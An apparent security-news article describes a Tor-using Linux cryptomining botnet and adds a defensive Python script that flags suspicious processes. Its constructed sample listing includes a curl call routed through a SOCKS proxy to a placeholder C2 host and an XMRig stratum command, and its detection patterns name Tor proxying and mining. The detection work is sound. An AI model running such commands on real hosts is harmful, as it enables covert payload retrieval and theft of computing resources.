A recently discovered malware botnet is targeting Linux systems using emerging techniques such as Tor proxies, the deactivation or removal of competing malware, and the abuse of legitimate DevOps tools.
Analysis shows that this Linux botnet downloads the files it needs from the Tor network, including essential binaries such as ps, as, ss, and curl. Using shell scripts and standard Unix tooling, the malware performs HTTP requests to gather more information about the infected systems.
To carry out the attacks, the threat actors maintain a large network of proxies that establish and maintain connections between the surface web and the Tor network. The proxies also send various identifying information about the target systems, including:
The botnet is currently being used for cryptocurrency mining: the XMRig Monero (XMR) miner is deployed onto the infected machines. The malware searches the system for running miners, deploys its own mining tools, and attempts to remove the competing miners. The malware only requires the Linux operating system to run and spread.
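A defender-side heuristic for the traits described above (dropped copies of ps/as/ss/curl running outside system paths, curl driven through a SOCKS/Tor proxy, an XMRig process), written as an added example that is not from the original article. The process listing is constructed, and the trusted directories, Tor default SOCKS port and stratum pool pattern are assumptions drawn from stock Linux and mining defaults.

```python
"""Heuristic triage of a process listing for the botnet traits described above."""
import re
from dataclasses import dataclass

# Where stock distributions install ps, ss and curl (assumption: adjust per distro).
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/")
# Binaries the article says the botnet fetches over Tor and runs from its own drop.
DROPPED_TOOLS = {"ps", "as", "ss", "curl"}
# Tor use hints: SOCKS proxy flags/URLs, .onion hosts (9050 is Tor's default SOCKS port).
TOR_HINT = re.compile(r"--socks5|socks5h?://|\.onion\b|127\.0\.0\.1:9050")
# XMRig by name, or any process pointed at a stratum mining pool.
MINER_HINT = re.compile(r"^xmrig$|stratum\+tcp://", re.IGNORECASE)
# One row of `ps -eo pid,comm,args --no-headers`: pid, short name, exe path, rest.
ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

@dataclass(frozen=True)
class Finding:
    pid: int
    reason: str

def analyse(ps_output: str) -> list[Finding]:
    """Return one Finding per suspicious trait seen in each process row."""
    findings: list[Finding] = []
    for line in ps_output.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # blank or malformed row
        pid, comm, exe = int(m.group(1)), m.group(2), m.group(3)
        args = m.group(4) or ""
        if comm in DROPPED_TOOLS and not exe.startswith(TRUSTED_DIRS):
            findings.append(Finding(pid, f"{comm} running from untrusted path {exe}"))
        if TOR_HINT.search(args):
            findings.append(Finding(pid, "process routed through a Tor/SOCKS proxy"))
        if MINER_HINT.search(comm) or MINER_HINT.search(args):
            findings.append(Finding(pid, "cryptominer process"))
    return findings

# Constructed sample listing (not a real capture); paths and hosts are placeholders.
SAMPLE_PS = """\
  812 sshd   /usr/sbin/sshd -D
 1204 curl   /usr/bin/curl -s https://updates.example.invalid/
 3391 curl   /tmp/.x/curl --socks5-hostname 127.0.0.1:9050 http://c2.invalid/r
 3392 ps     /tmp/.x/ps -ef
 3402 xmrig  /tmp/.x/xmrig -o stratum+tcp://pool.invalid:3333
 4001 bash   /bin/bash
"""

if __name__ == "__main__":
    for f in analyse(SAMPLE_PS):
        print(f"pid {f.pid}: {f.reason}")
```

Feed it the output of `ps -eo pid,comm,args --no-headers` from a suspect host; a stock curl or ps in /usr/bin produces no finding, while the same name under /tmp or a SOCKS-proxied command line does.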